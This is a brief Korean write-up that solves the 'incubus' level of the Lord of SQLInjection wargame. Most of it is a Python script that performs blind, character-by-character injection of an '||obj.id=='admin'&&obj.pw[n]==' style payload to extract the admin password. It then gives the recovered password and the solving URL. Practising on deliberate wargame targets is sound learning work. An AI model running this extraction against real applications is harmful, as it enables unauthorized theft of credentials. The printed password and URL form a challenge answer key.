incubus

첫 화면이다.

파이썬 코드를 짜면 아래와 같다.

import requests
import string

URL = 'https://los.rubiya.kr/chall/incubus_3dff9ce783c9f574edf015a7b99450d7.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'Hello admin'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# b47822ea
def find_pw():
    pw = ''
    pos = 0
    while True:
        found = False
        for character in string.printable:
            if query("'||obj.id=='admin'%26%26obj.pw[{}]=='{}".format(pos, character)) is True:
                pw += character
                found = True
                break
        if found is False:
            break
        pos += 1
    print('pw: {}'.format(pw))


find_pw()

실행결과, pw는 b47822ea 이다.

https://los.rubiya.kr/chall/incubus_3dff9ce783c9f574edf015a7b99450d7.php?pw=b47822ea 에 접속하면 문제가 풀린다.

Previoussiren NextPwnable.kr

Last updated 4 years ago